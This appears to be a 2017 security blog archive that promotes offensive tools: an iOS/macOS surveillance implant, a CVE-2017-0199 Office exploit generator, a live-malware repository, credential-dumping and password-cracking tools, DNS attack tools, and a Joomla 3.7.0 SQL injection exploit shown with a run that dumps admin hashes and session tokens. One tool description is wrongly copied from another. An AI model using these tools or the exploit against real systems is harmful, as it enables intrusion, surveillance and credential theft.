20/9/17

EggShell

About EggShell

EggShell is an iOS and macOS post exploitation surveillance pentest tool written in Python. This tool creates 1 line multi stage payloads that give you a command line session with extra functionality. EggShell gives you the power and convenience of uploading/downloading files, taking pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more. Server communication features end to end encryption with 128 bit AES and the ability to handle multiple clients. This is a proof of concept pentest tool, intended for use on machines you own.
For detailed information and howto visit http://lucasjackson.me/eggshell
Follow me on twitter: @neoneggplant

19/9/17

Exploit toolkit CVE-2017-0199


Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.



https://github.com/bhdresh/CVE-2017-0199

A repository of LIVE malwares for your own joy and pleasure

https://github.com/ytisf/theZoo


About

theZoo is a project created to make the possibility of malware analysis open and available to the public. Since we have found out that almost all versions of malware are very hard to come by in a way which will allow analysis, we have decided to gather all of them for you in an accessible and safe way. theZoo was born by Yuval tisf Nativ and is now maintained by Shahak Shalev.


PASSWORDS

http://www.nyxbone.com/pentest/PASSWORDS.html



HASHES

» findmyhash - Try to crack different types of hashes using free online services.

» Hash Identifier - Software to identify the different types of hashes used to encrypt data and especially passwords.

» Password Cracking Suite - Hash cracking suite.



ATTACK ONLINE

» brut3k1t - Brute-force (dictionary attack, jk) attack that supports multiple protocols and services.

» Credmap - The Credential Mapper - Is an open source tool that was created to bring awareness to the dangers of credential reuse.

» THC-Hydra - Network Logon Cracker.

» Invoke-TheHash - Contains PowerShell functions for performing pass the hash WMI and SMB command execution. WMI and SMB services are accessed through .NET TCPClient connections.



ATTACK OFFLINE

» DPAT - Domain Password Audit Tool - Is a python script that will generate password use statistics from password hashes dumped from a domain controller and a password crack file such as oclHashcat.pot generated from the oclHashcat tool during password cracking.

» FireMasterCracker - Firefox Master Password Cracking Software.

» Hashcat - World's fastest password cracker.

» Hob0Rules - Password cracking rules for Hashcat based on statistics and industry patterns.

» John the Ripper - Is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, and OpenVMS.

» JRecoverer - Another free password recovery software tool for Linux, Oracle, MySQL, PostgreSQL, Microsoft SQL Server, entre otras.

» LaZagne - Is an open source application used to retrieve lots of passwords stored on a local computer.

» Pwdump7 - Password dumper for windows.

» Quarks PwDump - Dump various types of Windows credentials without injecting in any process.

» Viper - Is a brute-force password cracker.



GENERAL

» CeWL - Custom Word List generator.

» Crunch - Is a wordlist generator where you can specify a standard character set or a character set you specify. crunch can generate all possible combinations and permutations.

» Offline NT Password & Registry Editor - Is a utility to reset the password of any user that has a valid local account on your Windows system.

» Passgen for Julia 0.2.2 - Is a replacement for crunch and stands between Crunch and Hashcat in terms of speed and variation.

» passtrust - A Ruby based tool that converts a simple passphrase into a secure password.

DNS TOOLS

http://www.nyxbone.com/pentest/DNS.html

TOOLS: 

» dig - (domain information groper) is a flexible tool for interrogating DNS name servers. 

» DNSBruteforce - DNS brute forcing utility that can query 2000 domains in 9 seconds. 

» DNSChef - is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka "Fake DNS") is a tool used for application network traffic analysis among other uses. 

» dnsenum - is a perl script that enumerates DNS information. 

» DNSMap - is a subdomain bruteforcer for stealth enumeration. 

» dnspredict 

» DNSQuerySniffer - is a network sniffer utility that shows the DNS queries sent on your system. 

» dnstwist - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage. 

» dnswalk - is a DNS debugger. It performs zone transfers of specified domains, and checks the database in numerous ways for internal consistency, as well as accuracy. 

» DomainHostingView - is a utility for Windows that collects extensive information about a domain by using a series of DNS and WHOIS queries, and generates HTML report that can be displayed in any Web browser. 

» Fierce - Is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains. 

» iodine - lets you tunnel IPv4 data through a DNS server. This can be usable in different situations where internet access is firewalled, but DNS queries are allowed. 

» JudasDNS - Nameserver DNS poisoning attacks made easy. 

» PassiveDNS - a network sniffer that logs all DNS server replies for use in a passive DNS setup. 

» QuickSetDNS - is a simple tool that allows you to easily change the DNS servers that are used for your Internet connection. You can set the desired DNS servers from the user interface, by choosing from a list of DNS servers that you defined, or from command-line, without displaying any user interface. 

» ReverseRaider - Is a domain scanner that uses various techniques, such as wordlist scanning to find target's subdomains or reverse resolution for a range of ip. 

» SubBrute - is a simple tool that allows you to easily change the DNS servers that are used for your Internet connection. You can set the desired DNS servers from the user interface, by choosing from a list of DNS servers that you defined, or from command-line, without displaying any user interface. 

Databases Penetration Testing

http://sqlmap.org/

https://github.com/Neohapsis/bbqsql

https://github.com/codingo/NoSQLMap

13/9/17

Exploit for Joomla 3.7.0 (CVE-2017-8917)

Exploit for Joomla 3.7.0 (CVE-2017-8917)

Another proof of concept exploit for Joomla, whoop-de-doo, this time a SQL Injection in 3.7.0.

Usage

Point the joomblah.py script at the vulnerable Joomla 3.7.0 install, it may take some time, but it will dump the users and session tables.
$ python joomblah.py http://127.0.0.1:8080
                                                                                                                    
    .---.    .-'''-.        .-'''-.                                                           
    |   |   '   _    \     '   _    \                            .---.                        
    '---' /   /` '.   \  /   /` '.   \  __  __   ___   /|        |   |            .           
    .---..   |     \  ' .   |     \  ' |  |/  `.'   `. ||        |   |          .'|           
    |   ||   '      |  '|   '      |  '|   .-.  .-.   '||        |   |         <  |           
    |   |\    \     / / \    \     / / |  |  |  |  |  |||  __    |   |    __    | |           
    |   | `.   ` ..' /   `.   ` ..' /  |  |  |  |  |  |||/'__ '. |   | .:--.'.  | | .'''-.    
    |   |    '-...-'`       '-...-'`   |  |  |  |  |  ||:/`  '. '|   |/ |   \ | | |/.'''. \   
    |   |                              |  |  |  |  |  |||     | ||   |`" __ | | |  /    | |   
    |   |                              |__|  |__|  |__|||\    / '|   | .'.''| | | |     | |   
 __.'   '                                              |/'..' / '---'/ /   | |_| |     | |   
|      '                                               '  `'-'`       \ \._,\ '/| '.    | '.  
|____.'                                                                `--'  `" '---'   '---' 

 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: rlbre_users
  -  Found table: tgukl_users
  -  Extracting users from rlbre_users
 [$] Found user ['361', 'Super User', 'admin', 'admin@example.com', '$2y$10$G4ivaKw71R4uIvuHYliSke5pHoh1Q.xm.Sk29d8zpzx4xJBfPoyEK', '', '']
  -  Extracting sessions from rlbre_session
 [$] Found session ['361', '3rfv8kql26s6kvimpbchneom85', 'admin']
  -  Extracting users from tgukl_users
 [$] Found user ['883', 'Super User', 'admin', 'admin@example.com', '$2y$10$5Za2zpqTdRo5x19cvO5biOKeiyOi2iTQ3u0SSLtcs6uvIvJhvM9aG', '', '']
  -  Extracting sessions from tgukl_session